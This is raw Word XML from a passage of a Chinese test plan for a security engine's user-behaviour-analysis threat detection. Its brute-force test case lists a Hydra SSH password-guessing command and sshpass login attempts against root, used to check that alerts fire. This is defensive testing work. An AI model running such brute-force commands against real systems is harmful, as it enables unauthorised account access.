                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过“搜索”输入文件哈希、主机名，文件类型，确认 异常信息被成功添加到可信白名单列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13DB3779" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04615887" wp14:editId="258DD583">
                  <wp:extent cx="4114800" cy="24631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cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2463165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BEBE410" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0399221E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="16D7E942" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C361AE5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B28D00" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="741C3B8D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="_Toc1922892047"/>
      <w:bookmarkStart w:id="279" w:name="_Toc36487924"/>
      <w:bookmarkStart w:id="280" w:name="_Toc36573233"/>
      <w:bookmarkStart w:id="281" w:name="_Toc260690372"/>
      <w:bookmarkStart w:id="282" w:name="_Toc36630319"/>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t>用户行为分析威胁检测功能测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
      <w:bookmarkEnd w:id="279"/>
      <w:bookmarkEnd w:id="280"/>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w14:paraId="7A25985D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="_Toc36487925"/>
      <w:bookmarkStart w:id="284" w:name="_Toc36573234"/>
      <w:bookmarkStart w:id="285" w:name="_Toc36630320"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>
      <w:bookmarkEnd w:id="284"/>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w14:paraId="0F5329A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>用户行为分析</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:t>是八分量可信引擎中的一个重要组成部分，在采用机器学习对历史数据中的用户对象进行行为建模的基础上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>实现线</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>上用户行为状态的实时检测，无论是外部攻击威胁还是内部威胁</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>亦或</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>是未知0Day威胁，用户行为分析都能够在用户行为画像的支持下进行威胁检测并告警。能够检测的安全威胁梳理如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047123D1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>常规恶性攻击，如暴力破解，后门攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0377B4FD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>漏洞利用攻击，如使用系统内的含漏洞的网络服务进行远程任意命令执行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266F9E5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>未知软件/行为/脚本，历史上从来未出现过的行为特性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D9191" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>异常的敏感操作行为，可能来源于外部攻击者或内部人员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49165D8A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="_Toc1847531025"/>
      <w:bookmarkStart w:id="287" w:name="_Toc36487926"/>
      <w:bookmarkStart w:id="288" w:name="_Toc36573235"/>
      <w:bookmarkStart w:id="289" w:name="_Toc36630321"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户行为分析引擎启动</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
      <w:bookmarkEnd w:id="287"/>
      <w:bookmarkEnd w:id="288"/>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w14:paraId="7A0F4641" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>用户行为分析有4个组件分别完成不同的功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370724A0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>用户行为分析 Train module：用户行为分析的训练模块，属于离线执行模块，支持通过命令行或接收用户行为分析 RPC的命令进行手动训练或自动周期性训练。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814CF17" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>用户行为分析 Detection module：用户行为分析的检测模块，属于线上功能模块，以Storm topology的形式运行在Storm平台上，通过接收实时用户行为数据和用户画像模型进行威胁检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41596B57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>用户行为分析 RPC：用户行为分析的调度管控组件，实现对训练和检测模块之间的通信，管理，控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E77B51C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>用户行为分析 Web：用户行为分析的UI组件，主要有告警显示和安全策略编辑的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BB81A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:t>因各组件启动中需要的数据和环境比较复杂，具体的安装部署启动过程有专门的材料进行阐述，在此不赘述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82C1D8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc36487927"/>
      <w:bookmarkStart w:id="291" w:name="_Toc36573236"/>
      <w:bookmarkStart w:id="292" w:name="_Toc36630322"/>
      <w:bookmarkEnd w:id="281"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
      <w:bookmarkEnd w:id="291"/>
      <w:bookmarkEnd w:id="292"/>
    </w:p>
    <w:p w14:paraId="4F5353CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="_Toc1761360306"/>
      <w:bookmarkStart w:id="294" w:name="_Toc36487928"/>
      <w:r w:rsidRPr="00536672">
        <w:t>暴力破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>
      <w:bookmarkEnd w:id="29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3F9A5A17" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC30BF5"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37AE9517" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>暴力破解检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="48B289DF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7EE9D1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62DCB903" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用专业的暴力破解工具（hydra）或手动执行登录操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="53EEEABE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04600B6E"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73A31F26" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="137154DD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FB05145"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7A2A7A29" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：暴力破解攻击往往成为大规模僵尸网络发展过程中的重要技术手段，通过大量的僵尸主机完成对网络段的批量扫描以实现使用弱口令完成暴力破解进而捕获对应的目标从而扩大僵尸网络范围。这是一种简单，经济</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>确及其</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>有效的攻击方式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A9D7CA4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>具体测试过程：使用专业暴力破解工具对被保护的机器进行ssh暴力破解攻击，同时也可以通过手动使用ssh手动登录进行登录尝试，在默认配置情况下，对指定主机一分钟内尝试失败5次即会触发暴力破解告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C38243" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65690048" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Hydra暴力破解：hydra -l root -P password.txt -t 16 ssh://{host}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083CAFFD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B382A9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>手动尝试登录：ssh root@{host} （在手动模式下应在短时间内尝试密码多次错误密码---大于配置文件中的报警阈值）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C7C198" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sshpass -p000 ssh root@{host}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5AC807" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D44CB58" wp14:editId="6339D71E">
                  <wp:extent cx="3590290" cy="2866390"/>
                  <wp:effectExtent l="0" t="0" r="1651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3590476" cy="2866667"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB865EC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>采用sshpass进行非交互式批量密码尝试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2ADD1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5EF50624" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD16618"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65468F51"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="07C28837" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78F98C9C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
